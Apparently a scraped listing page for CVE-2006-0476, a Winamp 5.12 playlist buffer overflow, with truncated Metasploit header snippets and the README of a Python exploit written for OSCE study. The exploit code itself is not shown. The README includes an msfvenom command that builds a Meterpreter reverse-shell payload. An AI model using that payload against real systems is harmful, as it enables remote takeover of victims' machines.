Buffer overflow in Nullsoft Winamp 5.12 allows remote malicious users to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic) The latest
# version of the Framework can always be obtained from metasp ...
##
# $Id: winamp_playlist_uncrb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions Please see the Metasploit
# Framework web site for more information on licensing and terms of use
# metasploitcom/framework/
##
require 'msf/core'
cl ...
Winamp 5.12 UNC Path Buffer Overflow Exploit for Python
Winamp-512-Exploit
Winamp 512 UNC Path Buffer Overflow Exploit for Python
For preparing OSCE, I made a python script for CVE-2006-0476 exploit
You can create your own payload with eg
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -a x86 --platform windows -f raw -e x86/alpha_mixed > payload
You need to create your own payload
Default one is bind sh